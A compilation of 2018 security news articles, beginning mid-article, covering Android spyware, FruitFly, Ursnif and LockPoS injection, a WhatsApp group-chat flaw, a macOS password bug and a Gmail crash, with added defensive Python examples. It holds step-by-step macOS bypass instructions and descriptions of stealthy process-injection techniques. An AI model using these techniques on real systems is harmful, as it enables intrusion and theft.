The Trojan used in this campaign, which McAfee detects as Android/HiddenApp.BP, is dropped onto the victim’s device via malicious APK files. Although various malicious apps are used for malware delivery, the dropper mechanism is identical, the researchers say.

The dropper first checks whether the device has already been infected, then tricks the victim into enabling accessibility permissions. The application then displays an overlay to hide the fact that it turns on the required settings and downloads and installs the Trojan. The overlay is removed once the installation has been completed.

The Trojan uses cloud services such as Dropbox and Yandex as the command and control (C&C) server. Once installed, it uploads device information to the cloud, then downloads a file containing commands and other data to control the infected device. Malicious behavior such as saving SMS messages and contact information is implemented in a separate DEX file.

Variants of the malicious APKs were found on Google Drive, some using different cloud services as C&Cs, while others also drop a separate call-recording application.

The researchers discovered that the initial malicious APKs were uploaded to Google Drive from a single account, which was also associated with a social network account. The same account is believed to have been used to send shortened URLs to victims.

The group behind the account appears to know the South Korean culture well, yet the account also revealed the use of the North Korean word for “blood type,” instead of the South Korean word. A North Korean IP address was also found in test log files on some Android devices connected to accounts used to spread the malware.

The researchers also discovered a deleted folder named Sun Team, which supposedly reveals the name of the actor behind the campaign; the group is believed to have been active since 2016.

“This malware campaign is highly targeted, using social network services and KakaoTalk to directly approach targets and implant spyware. We cannot confirm who is behind this campaign, and the possible actor Sun Team is not related to any previously known cybercrime groups. The actors are familiar with South Korea and appear to want to spy on North Korean defectors, and on groups and individuals who help defectors,” McAfee concludes.


Meltdown Patch Broke Some Ubuntu Systems
11.1.2018 securityweek
Vulnerability
Canonical was forced to release a second round of Ubuntu updates that address the recently disclosed CPU vulnerabilities after some users complained that their systems no longer booted after installing the initial patches.

On January 9, Canonical released Ubuntu updates designed to mitigate Spectre and Meltdown, two recently disclosed attack methods that work against processors from Intel, AMD, ARM, Qualcomm and IBM. The Linux kernel updates mitigate the vulnerabilities that allow the Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715) attacks.

Shortly after the kernel was updated to version 4.4.0-108, some Ubuntu users started complaining that their systems had failed to boot. Restoring the system to an earlier version apparently resolved the problem.

The updates released by Microsoft in response to the CPU flaws also caused problems, but only for users with some older AMD processors. The company has decided to no longer deliver the updates to AMD devices until compatibility issues are resolved. In the case of Ubuntu, however, the update has affected users with Intel processors.

Canonical has confirmed that the fix for the Meltdown vulnerability introduced a regression that prevented systems from booting successfully. The issue has been addressed with the release of new updates that deliver version 4.4.0-109 of the kernel.

Many affected users have confirmed that their systems boot properly after updating to 4.4.0-109. While it’s unclear how many devices have been hit, Canonical’s advisories mention “a few systems.”

Affected tech firms started announcing the availability of patches and workarounds for the Spectre and Meltdown vulnerabilities shortly after the flaws were disclosed by researchers. The latest major companies to release mitigations are IBM, whose POWER processors and Power Systems servers are impacted, and NVIDIA, which released updates for GPU display drivers and other products to help mitigate the CPU issues.

Meltdown and Spectre allow malicious applications to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive information. Patches for the underlying vulnerabilities may introduce significant performance penalties.


Mac Malware Creator Indicted in U.S.
11.1.2018 securityweek Apple
“FruitFly” Mac Malware Creator Allegedly Spied On Victims for 13 Years

An Ohio man was charged this week in a 16-count indictment for allegedly developing malware known as “FruitFly” and for infecting thousands of computers with it.

The man, Phillip R. Durachinsky, 28, of North Royalton, Ohio, has been charged with using the malware for more than 13 years to watch, listen to, and obtain personal data from unknowing victims, as well as to produce child pornography.

FruitFly, also known as Quimitchin, was first discovered a year ago, despite being said to have been developed over a decade ago. The malware was supposedly designed to exfiltrate data from anything it can access and its presence on machines at biomedical facilities led researchers to believe it was a cyber-espionage tool. What isn’t yet clear is how the malware was distributed to the compromised systems.

At Virus Bulletin last year, security researcher Patrick Wardle presented a paper on a second variant of FruitFly, explaining that the threat is installed persistently on the victims’ machines, that it employs obfuscation, and that it includes support for a large number of commands. By setting up a custom command and control (C&C) server for the threat, he was also able to observe and analyze the malware’s behavior.

The malware, Wardle revealed, included support for around 25 commands, and supports advanced commands rarely seen in macOS malware, such as the ability to simulate mouse and keyboard events, likely in an attempt to interact with system dialogs or alerts from security products.

Although designed to target Macs, FruitFly was found to contain Linux shell commands and to run just fine on Linux, which suggested that a variant targeting this operating system might have been built as well. Windows-based executable files that communicated with the malware’s C&C were also discovered, and one of them was found to use a libjpeg library that hasn't been updated since 1998, but which FruitFly also uses.

According to the indictment the Department of Justice made public this week, Durachinsky from 2003 through Jan. 20, 2017, allegedly orchestrated a scheme to access “thousands of protected computers owned by individuals, companies, schools, a police department, and the government, including one owned by a subsidiary of the U.S. Department of Energy.”

Using the FruitFly malware, he allegedly controlled infected computers “by accessing stored data, uploading files, taking and downloading screenshots, logging a user’s keystrokes, and turning on the camera and microphone to surreptitiously record images and audio,” DoJ said.

The indictment also alleges that Durachinsky used the malware to steal victims’ personal information, including logon credentials, tax records, medical records, photographs, banking records, Internet searches, and communications. He is also charged with using the stolen credentials to access and download information from third-party websites.

Moreover, Durachinsky is said to have used the compromised systems to watch and listen to victims without their knowledge or permission and to intercept oral communications taking place in the room where the infected computer was located. Durachinsky was apparently alerted if a user typed words associated with pornography and is said to have saved millions of images and to have kept detailed notes of what he saw.

“For more than 13 years, Phillip Durachinsky allegedly infected with malware the computers of thousands of Americans and stole their most personal data and communications,” Acting Assistant Attorney General John P. Cronan of the Justice Department’s Criminal Division said.


CSE Malware ZLab – Double Process Hollowing -The stealth process injection of the new Ursnif malware
11.1.2018 securityaffairs
Virus

A new variant of the infamous Ursnif malware spread in the wild and adopts a new advanced evasion technique dubbed Double Process Hollowing.
While the LockPoS malware, known for its new and highly sophisticated evasion technique, spread and affected many Point of Sale systems, another variant has appeared in the wild that adopts a similar but not identical evasion trick. It is likely a new variant of “ursnif v3”, a further evolution of an old banking trojan that has been spreading since November 2017. Moreover, the command and control server of this new malware, oretola[.]at, has been sinkholed by authorities, so it is difficult to reconstruct the entire behavior and the real purpose of this malware.

However, it is very interesting to analyze its stealth evasion technique, which allows it to remain invisible to much modern antivirus software. Its final stage hides the malware as a thread of the “explorer.exe” process, which makes analysis very difficult. To reach this goal, the malware uses a sort of “double process hollowing” technique based on the Windows Native API, leveraging the “svchost.exe” system process to escalate privileges and inject malicious code into “explorer.exe”.

Only after concealing itself in “explorer.exe” does it start its malicious operations, which consist of contacting a series of compromised sites that host encrypted additional payloads. The final step of its malicious behavior is to periodically communicate with its C2, “oretola[.]at”, sending information about the victim host.

This malware probably spreads through spam emails; the message contains a URL that points to a compromised site on which the sample is hosted. We discovered the malware sample on just one of these compromised sites, an Italian blog dedicated to dolls: “marinellafashiondolls[.]com/_private/php3.exe”.

Process Hollowing evasion technique

The malware uses almost exclusively the Windows Native API, including its undocumented functions, which makes monitoring by antivirus products more difficult.

Once the php3.exe file is executed, it deletes itself from the original path and copies itself to “%APPDATA%\Roaming\Microsoft\Brdgplua\ddraxpps.exe”.

Once this operation is complete, the malware starts its malicious behavior.

The full report published by the researchers at ZLab details the technique implemented by the malware step by step.


macOS Malware Creator Charged With Spying on Thousands of PCs Over 13 Years
11.1.2017 thehackernews Apple

The U.S. Justice Department on Wednesday unsealed a 16-count indictment against a computer programmer from Ohio who is accused of creating and installing spyware on thousands of computers for more than 13 years.
According to the indictment, 28-year-old Phillip R. Durachinsky is the alleged author of FruitFly malware that was found targeting Apple Mac users earlier last year worldwide, primarily in the United States.
Interestingly, Durachinsky was just 14 years old when he programmed the first version of the FruitFly malware, and this full-fledged backdoor trojan went largely undetected for several years, despite using unsophisticated and antiquated code.
The malware was initially discovered in January 2017 by Malwarebytes and then Patrick Wardle, an ex-NSA hacker, found around 400 Mac computers infected with the newer strain of FruitFly. However, Wardle believed the number of infected Macs would likely be much higher.
The malware is capable of advanced surveillance on macOS devices with the ability to remotely take control of webcams, microphones, screen, mouse, and keyboards, as well as install additional malicious software.
Since the source code of FruitFly also includes Linux shell commands, the researchers believe the malware would work just fine on the Linux operating system.
From 2003 to January 2017, Durachinsky used spyware, which was later named FruitFly, to gain access to thousands of computers belonging to individuals, companies, schools, a police department, and a subsidiary of the U.S. Department of Energy.
Durachinsky allegedly used the malware to steal the personal data of victims, including their tax records, banking records, medical records, login credentials, photographs, Internet searches, and potentially embarrassing communications.
"He is alleged to have developed computer malware later named “Fruitfly” that he installed on computers and that enabled him to control each computer by accessing stored data, uploading files, taking and downloading screenshots, logging a user’s keystrokes, and turning on the camera and microphone to surreptitiously record images and audio," the DoJ says.
Besides installing Fruitfly, Durachinsky is also accused of producing child pornography, as in some cases, the malware alerted him if a user typed any pornography term. It’s likely such action would prompt recording.
Durachinsky is facing charges of Computer Fraud and Abuse Act violations, Wiretap Act violations, production of child pornography, and aggravated identity theft.
However, the charges are merely allegations at this time, and the defendant is presumed innocent unless proven guilty beyond a reasonable doubt in a court of law.


WhatsApp Flaw Could Allow 'Potential Attackers' to Spy On Encrypted Group Chats
11.1.2017 thehackernews
Social

A more dramatic revelation of 2018—an outsider can secretly eavesdrop on your private end-to-end encrypted group chats on WhatsApp and Signal messaging apps.
Considering protection against three types of attackers—malicious user, network attacker, and malicious server—an end-to-end encryption protocol plays a vital role in securing instant messaging services.
The primary purpose of having end-to-end encryption is to stop trusting the intermediate servers in such a way that no one, not even the company or the server that transmits the data, can decrypt your messages or abuse its centralized position to manipulate the service.
In other words, assuming the worst-case scenario, a corrupt company employee should not be able to eavesdrop on the end-to-end encrypted communication by any means.
However, so far even the popular end-to-end encrypted messaging services, like WhatsApp, Threema and Signal, have not entirely achieved a zero-knowledge system.
Researchers from Ruhr-Universität Bochum (RUB) in Germany found that anyone who controls WhatsApp/Signal servers can covertly add new members to any private group, allowing them to spy on group conversations, even without the permission of the administrator.
As described by the researchers, in pairwise communication (when only two users communicate with each other) the server plays a limited role, but in multi-user chats (group chats where encrypted messages are broadcast to many users) the server's role grows to managing the entire process.
That's where the issue resides: the company's servers are trusted to manage group members (who eventually have full access to the group conversation) and their actions.
As explained in the newly published RUB paper, titled "More is Less: On the End-to-End Security of Group Chats in Signal, WhatsApp, and Threema," since both Signal and WhatsApp fail to properly authenticate who is adding a new member to the group, it is possible for an unauthorized person, who is neither a group administrator nor even a member of the group, to add someone to the group chat.
What's more, if you assume that adding a new member to the group will show a visual notification to the other members, that is not the case.
According to the researchers, a compromised admin or rogue employee with access to the server could manipulate (or block) the group management messages that are supposed to alert group members of a new member.
"The described weaknesses enable attacker A, who controls the WhatsApp server or can break the transport layer security, to take full control over a group. Entering the group, however, leaves traces since this operation is listed in the graphical user interface. The WhatsApp server can therefore use the fact that it can stealthily reorder and drop messages in the group," the paper reads.
"Thereby it can cache sent messages to the group, read their content first and decide in which order they are delivered to the members. Additionally, the WhatsApp server can forward these messages to the members individually such that a subtly chosen combination of messages can help it to cover the traces."
WhatsApp has acknowledged the issue, but argued that if any new member is added to a group, let's say by anyone, other group members will get notified for sure.
"We've looked at this issue carefully. Existing members are notified when new people are added to a WhatsApp group. We built WhatsApp so group messages cannot be sent to a hidden user," a WhatsApp spokesperson told Wired.
"The privacy and security of our users is incredibly important to WhatsApp. It's why we collect very little information and all messages sent on WhatsApp are end-to-end encrypted."
But unless you are part of a group with very carefully selected members, I'm sure many of you would easily ignore such notifications.
Researchers also advised companies to fix the issue just by adding an authentication mechanism to make sure that the "signed" group management messages come from the group administrator only.
However, this attack is not easy (exception—services under legal pressure) to execute, so users should not be worried about it.


[Bug] macOS High Sierra App Store Preferences Can Be Unlocked Without a Password
11.1.2017 thehackernews Apple

Yet another password vulnerability has been uncovered in macOS High Sierra, which unlocks App Store System Preferences with any password (or no password at all).
A new password bug has been discovered in the latest version of macOS High Sierra that allows anyone with access to your Mac to unlock App Store menu in System Preferences with any random password or no password at all.
The impact of this vulnerability is nowhere as serious as the previously disclosed root login bug in Apple's desktop OS that enabled access to the root superuser account simply by entering a blank password on macOS High Sierra 10.13.1.
As reported on Open Radar earlier this week, the vulnerability impacts macOS version 10.13.2 and requires the attacker to be logged in with an administrator-level account for this vulnerability to work.
I checked the bug on my fully updated Mac laptop, and it worked by entering a blank password as well as any random password.
If you're running latest macOS High Sierra, check yourself:
Log in as a local administrator
Go to System Preferences and then App Store
Click on the padlock icon (double-click on the lock if it is already unlocked)
Enter any random password (or leave it blank) in login window
Click Unlock, Ta-da!
Once done, you'll gain full access to App Store settings, allowing you to modify settings like disabling automatic installation of macOS updates, app updates, system data files and even security updates that would patch vulnerabilities.
We also tried to reproduce the same bug on the latest developer beta 4 of macOS High Sierra 10.13.3, but it did not work, suggesting Apple probably already knows about this issue and you'll likely get a fix in this upcoming software update.
What's wrong with password prompts in macOS? It's high time Apple stopped shipping updates with such embarrassing bugs.
Apple also patched a similar vulnerability in macOS in October, which affected encrypted APFS volumes: the password hint field displayed the user's actual password in plain text.


A security issue in WhatsApp potentially allows attackers to eavesdrop on encrypted Group chats
11.1.2017 securityaffairs Crypto

An attacker can secretly eavesdrop on your private end-to-end encrypted group chats on WhatsApp, Threema and Signal messaging apps.
Even if the messaging services implement end-to-end encryption, an attacker or someone in the company that provides the service can decrypt your messages.

A group of researchers from Ruhr-Universität Bochum (RUB) in Germany discovered that anyone who controls the WhatsApp or Signal servers can covertly add new members to any private group without the administrator's permission; with this trick it is possible to spy on group conversations.

In the case of multi-user chats, the servers manage the entire communication process.

“Contrary to classical multi-user chats, for example, to IRC in which all members are online, groups in IM protocols must work in asynchronous settings; Groups must be createable and messages must be deliverable even if some group members are offline” reads the paper published by the researchers, titled “More is Less: On the End-to-End Security of Group Chats in Signal, WhatsApp, and Threema.”

“We observed two shortcomings in the design of WhatsApp’s group protocol that allow to (1) burgle into a group and to (2) forge acknowledgments. The shortcomings have similar results as the attacks on Signal, although the underlying protocol and exploitation differ.”

The experts discovered that both Signal and WhatsApp fail to properly authenticate the entity that is adding a new member to the group. This means that an unauthorized user who is not a group administrator, or even a member of the group, can add a member to the group conversation.

Experts also discovered that it is possible to add a new member without notifying the other members: a rogue admin or an employee with access to the server could manipulate (or block) the group management messages.

The abilities to burgle into a group and to forge acknowledgments could be chained to allow an attacker who controls the WhatsApp server or can break the transport layer security to fully control group activities.

“The described weaknesses enable attacker A, who controls the WhatsApp server or can break the transport layer security, to take full control over a group. Entering the group, however, leaves traces since this operation is listed in the graphical user interface. The WhatsApp server can therefore use the fact that it can stealthily reorder and drop messages in the group,” explained the researchers.

“Thereby it can cache sent messages to the group, read their content first and decide in which order they are delivered to the members. Additionally, the WhatsApp server can forward these messages to the members individually such that a subtly chosen combination of messages can help it to cover the traces.”

According to WhatsApp, the situation is quite different because if any new member is added to a group other group members will receive a notification.

“We’ve looked at this issue carefully. Existing members are notified when new people are added to a WhatsApp group. We built WhatsApp so group messages cannot be sent to a hidden user,” a WhatsApp spokesperson told Wired.

“The privacy and security of our users is incredibly important to WhatsApp. It’s why we collect very little information and all messages sent on WhatsApp are end-to-end encrypted.”

The RUB team also recommends that the companies solve the issue by adding an authentication mechanism to group management messages, so that only legitimate administrators can manage the activities of group chats.

The Ruhr University researchers reported their findings to WhatsApp in July. In response, WhatsApp fixed one problem with a feature of its encryption that made it harder to crack future messages even after an attacker obtained one decryption key.

“But they told the researchers the group invitation bug they’d found was merely “theoretical” and didn’t even qualify for the so-called bug bounty program run by Facebook, WhatsApp’s corporate owner, in which security researchers are paid for reporting hackable flaws in the company’s software.” continues Wired.

As mentioned, the experts also investigated Threema and Signal.

For Threema, the researchers found minor flaws: an attacker who controls the server can replay messages or re-add users who had been removed from a group. Once informed of the issues, Threema released a version that addresses them.

For Signal, the attack is more difficult because the attacker would have to not only control the Signal server but also know an unguessable number called the Group ID. The Group ID can only be obtained from one of the group members’ devices, in which case the group is likely already compromised.
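The two write-ups above (the thehackernews piece and this securityaffairs one) both come down to the same design point: members act on group-management messages that the server relays but nobody authenticates, and the recommended fix is to have administrators sign them. The following is an added toy model, not code from WhatsApp, Signal or the RUB paper, that runs the same server-forged "add member" message through both designs. HMAC-SHA256 with a constructed admin key stands in for the digital signature the paper recommends, and the member names, message layout and sequence counter (which also covers the Threema replay finding) are assumptions for illustration.

```python
import hmac
import hashlib
import json
from dataclasses import dataclass

# Constructed key for the example: held by the administrator. A real design would
# use a per-admin signing key so members can verify but never forge.
ADMIN_KEY = b"constructed-admin-group-management-key"


class GroupError(Exception):
    """Raised when a group-management message must be rejected."""


@dataclass
class GroupState:
    admins: set
    members: set
    last_seq: int = 0  # highest management-message sequence number accepted so far


def encode(msg: dict) -> bytes:
    """Canonical encoding of every field except the tag itself."""
    body = {k: v for k, v in msg.items() if k != "tag"}
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def admin_add_member(sender: str, new_member: str, seq: int, key: bytes = ADMIN_KEY) -> dict:
    """An administrator builds an authenticated 'add member' message."""
    msg = {"type": "add", "sender": sender, "member": new_member, "seq": seq}
    msg["tag"] = hmac.new(key, encode(msg), hashlib.sha256).hexdigest()
    return msg


def apply_unauthenticated(state: GroupState, msg: dict) -> None:
    """The weak design: members act on whatever 'add' the server delivers.

    Nothing ties the message to an administrator, so a server that relays it
    can just as well fabricate it; that is the weakness the articles describe."""
    if msg["type"] == "add":
        state.members.add(msg["member"])


def apply_authenticated(state: GroupState, msg: dict, key: bytes = ADMIN_KEY) -> None:
    """The recommended fix: accept an 'add' only if a current admin tagged it
    and it is not a replay of an earlier management message."""
    if msg["type"] != "add":
        raise GroupError("unsupported message type")
    if msg["sender"] not in state.admins:
        raise GroupError("sender is not an administrator")
    expected = hmac.new(key, encode(msg), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, msg.get("tag", "")):
        raise GroupError("management message is not authenticated")
    if msg["seq"] <= state.last_seq:
        raise GroupError("replayed management message")
    state.last_seq = msg["seq"]
    state.members.add(msg["member"])


def server_forged_add(new_member: str) -> dict:
    """What a malicious server can emit: an untagged 'add' naming an admin as sender."""
    return {"type": "add", "sender": "alice", "member": new_member, "seq": 99, "tag": ""}


def demo() -> dict:
    """Run the same forged message through both designs and report the outcomes."""
    weak = GroupState(admins={"alice"}, members={"alice", "bob"})
    fixed = GroupState(admins={"alice"}, members={"alice", "bob"})
    forged = server_forged_add("eve")

    apply_unauthenticated(weak, forged)  # eve is silently admitted
    try:
        apply_authenticated(fixed, forged)  # rejected: the tag does not verify
        forged_rejected = False
    except GroupError:
        forged_rejected = True

    legit = admin_add_member("alice", "carol", seq=1)
    apply_authenticated(fixed, legit)  # a genuine admin add succeeds
    try:
        apply_authenticated(fixed, legit)  # delivering it again is a replay
        replay_rejected = False
    except GroupError:
        replay_rejected = True

    return {
        "weak_members": sorted(weak.members),
        "fixed_members": sorted(fixed.members),
        "forged_rejected": forged_rejected,
        "replay_rejected": replay_rejected,
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Note that the forged message names a real administrator as its sender, so a check on the sender field alone is not enough; the message has to carry something only the administrator could have produced, which is exactly what the RUB recommendation adds.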


Italian researcher discovered that Gmail shuts down after being sent a Zalgo text
11.1.2018 securityaffairs
Vulnerability

Researchers at the security firm We Are Segment have discovered a vulnerability in Gmail: a “distorted” message shuts down the most famous webmail in the world.
The cybersecurity company We Are Segment, part of the Interlogica group, discovered a severe vulnerability in Gmail.

Last month the Italian firm made the headlines due to the discovery of the Tormoil vulnerability.

The flaw in Gmail was discovered by the white hat hacker Roberto Bindi. It could be exploited to shut down Gmail by sending the victim a specially crafted message, preventing the user from accessing his/her email account.

“The test was born out of curiosity. Roberto wanted to see what would have happened if a Zalgo text was injected into a web browser.” reads the press release published by the company.

A Zalgo text is text composed of characters and metacharacters (letters, numbers and other symbols) that extend sideways, above and below the original text, thanks to the effect produced by standard Unicode combining characters.

The first experiment conducted by the expert demonstrated that inserting a Zalgo text (which can also be generated by web applications) containing a great number of metacharacters (more than 1,000,000) crashed the browser, which shut down for a few minutes.

Despite the already interesting results, Roberto Bindi didn’t stop there, he decided to send a Zalgo text via Gmail again, expecting another browser crash. Unfortunately, he couldn’t even imagine what kind of results this test would reveal.

What he managed to discover surpassed his imagination: it wasn’t the browser that crashed, but Gmail itself.
The email is received by the recipient, but it cannot be opened and, after just a few moments, Gmail shuts down with an “Error 500” message (an internal server error with an unspecified cause, such as an irreversible code error).
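The failure described above comes from a renderer meeting an unbounded stack of Unicode combining marks on a single base character. As an added example, not part of the original article or of We Are Segment's research, here is the input check a mail or web service can apply before storing or rendering text: measure the longest run of combining marks and cap it. The limit of two marks per base character is an assumed policy, and the sample strings are constructed.

```python
import unicodedata

# Assumed policy for this example: keep at most this many combining marks per base character.
MAX_MARKS_PER_BASE = 2

# Constructed sample: "Zalgo" with five marks stacked on the Z and two on the a.
ZALGO_SAMPLE = "Z\u0334\u0327\u031b\u0341\u0350a\u0335\u0322lgo"


def max_combining_run(text: str) -> int:
    """Longest run of consecutive combining marks in the text.

    NFD is used so that a precomposed letter such as U+00E9 counts the same as
    'e' followed by U+0301; canonical decomposition never removes marks, it
    only reorders them by combining class."""
    longest = run = 0
    for ch in unicodedata.normalize("NFD", text):
        if unicodedata.combining(ch):
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    return longest


def looks_like_zalgo(text: str, limit: int = MAX_MARKS_PER_BASE) -> bool:
    """True when any base character carries more marks than the policy allows."""
    return max_combining_run(text) > limit


def strip_excess_marks(text: str, limit: int = MAX_MARKS_PER_BASE) -> str:
    """Drop every combining mark beyond `limit` on each base character, then
    recompose to NFC so ordinary accented text comes back unchanged."""
    kept = []
    run = 0
    for ch in unicodedata.normalize("NFD", text):
        if unicodedata.combining(ch):
            run += 1
            if run > limit:
                continue  # excess mark on this base character: discard it
        else:
            run = 0
        kept.append(ch)
    return unicodedata.normalize("NFC", "".join(kept))


if __name__ == "__main__":
    print("marks on one base:", max_combining_run(ZALGO_SAMPLE))
    print("flagged:", looks_like_zalgo(ZALGO_SAMPLE))
    print("sanitized:", repr(strip_excess_marks(ZALGO_SAMPLE)))
```

Detection and sanitization are kept separate on purpose: a mail pipeline would typically log and reject at `looks_like_zalgo`, while a display layer that must show the text anyway would run `strip_excess_marks` so the renderer never sees a pathological stack. Both functions are linear in the input length, so a million-mark message costs one pass rather than a hang.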

The young researcher managed to find a technical artifice to bypass the block and reactivate the email account, in order to repeat the experiment and verify the duration of the Gmail shutdown. He discovered that the account went down for 4 entire days.

Following this discovery, Roberto decided to contact Google’s team. After a few weeks, the team communicated that they had begun working on the issue.

“After discovering that by sending a series of special characters Google’s mail system stopped working, I started worrying about the possible consequences and damages that this vulnerability might have caused when publicized. An ill-intentioned person might have blocked email accounts like “purchases@…” or other work emails by sending a simple email,” explained Roberto Bindi.
“That’s why my company decided to publish this piece of information only after the issue had been solved by Google. Our choice was based on ethics and it mirrors our company’s ethics code, underlining how WeAreSegment is formed by ethical hackers.”

This Gmail vulnerability discovered by the researcher Roberto Bindi demonstrates how research is one of the most important aspects of cyber security.

“Thanks to this activity, we can directly contribute to the Cyber Security improvement worldwide” – says Filippo Cavallarin, We Are Segment CEO.


New Malware Dubbed LockPoS Introduces New Injection Technique To Avoid Detection
11.1.2018 securityaffairs
Virus

Security Researchers from Cyberbit have discovered a new malware injection technique being used by a variant of Flokibot malware named LockPoS.
Point of Sale (PoS) malware is a malicious application that steals credit card data from the memory of computers connected to credit card equipment. Once it has infected a system, LockPoS tries to read the memory of the running processes and searches for data matching the pattern of credit card information, which it sends to its command and control server.

“Cyberbit malware researchers recently discovered a stealthy new malware injection technique being used by LockPoS that appears to be a new variant of that used by Flokibot.” reads the analysis published by CyberBit.

“LockPoS is a Point-of-Sale (PoS) malware that steals credit card data from the memory of computers attached to point of sale credit card scanners. LockPos reads the memory of currently running processes on the system, searching for data that looks like credit card information and then sends them to the C&C.”

LockPoS is distributed by the same botnet that propagated Flokibot, and its source code shows some similarities. That said, the malware goes through several unpacking and decryption stages, and the techniques and routines it uses to call the injection-related APIs differ from those of Flokibot.

CyberBit identified three main routines the PoS malware uses to inject code into a remote process: NtCreateSection, NtMapViewOfSection, and NtCreateThreadEx. All of them are exported by ntdll.dll, a core Windows system DLL. The ntdll routines with the “Nt” prefix form the native API boundary between user space and kernel space. The injection technique creates a section object in the kernel with NtCreateSection, calls NtMapViewOfSection to map a view of that section into another process, copies the code into the section, and then creates a remote thread with NtCreateThreadEx or CreateRemoteThread to execute the code.

When a routine from ntdll is called, the hexadecimal value of the system call is copied into the EAX register and an instruction is executed that transitions the thread to kernel mode. The kernel then executes the routine selected by the value in EAX; the parameters are copied from the user stack to the kernel stack and the call is carried out.

To avoid antivirus detection, the malware does not call the injection routines in the ntdll already loaded in memory; instead, it maps ntdll from disk into its own virtual address space. By doing so the malware keeps a clean copy of the DLL whose use is not detected by antivirus software.

Also, as Cyberbit researchers noticed, the malware calls NtMapViewOfSection against the explorer.exe process.

“One LockPoS malware injection technique involves creating a section object in the kernel using NtCreateSection, calling NtMapViewOfSection to map a view of that section into another process, copying code into that section and creating a remote thread using NtCreateThreadEx or CreateRemoteThread to execute the mapped code.” continues the analysis.


The researchers’ report also notes that improved memory analysis is the only effective way to detect this technique, since kernel functions cannot be monitored on Windows 10.
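As an added example of the memory analysis the report points at (not code from Cyberbit's analysis or from the LockPoS sample), the heuristic below scans captured process memory for copies of the x64 ntdll system-call stub, the `mov eax, <number>` followed by the kernel transition described above, and flags any copy that does not lie inside the loaded ntdll.dll image. A second copy of the stubs in private, module-less memory is exactly what an ntdll mapped from disk into the malware's own address space would look like. The memory regions, module names, addresses and system call numbers are constructed placeholders, and the byte pattern covers the x64 stub layout only.

```python
import re
from dataclasses import dataclass
from typing import List

# Classic x64 ntdll system-call stub as it appears on disk:
#   4C 8B D1          mov  r10, rcx
#   B8 xx xx xx xx    mov  eax, <system call number>
#   0F 05             syscall
# Later Windows 10 builds insert a short test/jne sequence between the mov and
# the syscall, so the pattern tolerates a small gap before the syscall opcode.
STUB_RE = re.compile(rb"\x4C\x8B\xD1\xB8(.{4}).{0,16}?\x0F\x05", re.DOTALL)


@dataclass
class Region:
    base: int    # virtual address the captured bytes were read from
    module: str  # backing module name, "" for private (unbacked) memory
    data: bytes  # captured contents (constructed here; from a process dump in practice)


@dataclass
class Hit:
    address: int
    syscall_number: int
    module: str


def find_syscall_stubs(region: Region) -> List[Hit]:
    """Locate every system-call stub in one region's captured bytes."""
    hits = []
    for m in STUB_RE.finditer(region.data):
        number = int.from_bytes(m.group(1), "little")
        hits.append(Hit(region.base + m.start(), number, region.module))
    return hits


def scan_regions(regions: List[Region]) -> List[Hit]:
    """Scan every captured region and collect all stub locations."""
    hits = []
    for region in regions:
        hits.extend(find_syscall_stubs(region))
    return hits


def suspicious_hits(hits: List[Hit]) -> List[Hit]:
    """Stubs belong inside the loaded ntdll.dll image; a copy anywhere else
    (private memory or another module) matches the 'ntdll mapped from disk'
    behaviour the article describes and deserves analyst attention."""
    return [h for h in hits if h.module.lower() != "ntdll.dll"]


def make_stub(number: int) -> bytes:
    """Build a classic-layout stub to populate the constructed sample memory."""
    return b"\x4C\x8B\xD1\xB8" + number.to_bytes(4, "little") + b"\x0F\x05\xC3"


# Constructed sample memory. 0x1A and 0x2B are placeholder numbers, not real
# Windows system call numbers, and the addresses are illustrative.
SAMPLE_REGIONS = [
    Region(0x7FFB12340000, "ntdll.dll",
           b"\x90" * 64 + make_stub(0x1A) + b"\xCC" * 32 + make_stub(0x2B) + b"\x90" * 64),
    Region(0x7FF612340000, "sample_process.exe", b"\x00" * 128),
    # Private memory holding a second copy of the two stubs.
    Region(0x000001E2A0000000, "",
           b"\x00" * 256 + make_stub(0x1A) + b"\x00" * 16 + make_stub(0x2B) + b"\x00" * 256),
]


def triage(regions: List[Region] = SAMPLE_REGIONS) -> dict:
    """Return the total number of stubs seen and the ones outside ntdll.dll."""
    hits = scan_regions(regions)
    return {"total_stubs": len(hits), "flagged": suspicious_hits(hits)}


if __name__ == "__main__":
    result = triage()
    print(f"{result['total_stubs']} stubs found, {len(result['flagged'])} outside ntdll.dll")
    for h in result["flagged"]:
        print(f"  {h.address:#018x} syscall {h.syscall_number:#x} in {h.module or '<private>'}")
```

In real triage the regions would come from a memory-forensics tool that reports each mapping's backing module; the scan only narrows the field, and an analyst still confirms whether a flagged copy is a manually mapped ntdll or something benign such as a legitimate instrumentation library.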

Sources:

https://www.cyberbit.com/new-lockpos-malware-injection-technique/
https://www.scmagazine.com/lockpos-malware-adopts-injection-technique-to-evade-detection/article/735425/
https://www.infosecurity-magazine.com/news/lockpos-takes-a-page-from-flokibot/
http://www.securityweek.com/lockpos-adopts-new-injection-technique
https://www.scmagazineuk.com/lockpos-malware-adopts-injection-technique-to-evade-detection/article/735729/
http://newsroom.trendmicro.com/news/endpoint/lockpos-malware-sneaks-onto-kernel-via-new-injection-technique/d/d-id/1330757
https://securityonline.info/lockpos-malware-use-new-injection-technology-to-sneaks-onto-kernel/
https://vulners.com/threatpost/NEW-POINT-OF-SALE-MALWARE-LOCKPOS-HITCHES-RIDE-WITH-FLOKIBOT/126795
https://www.darkreading.com/endpoint/lockpos-malware-sneaks-onto-kernel-via-new-injection-technique/d/d-id/1330757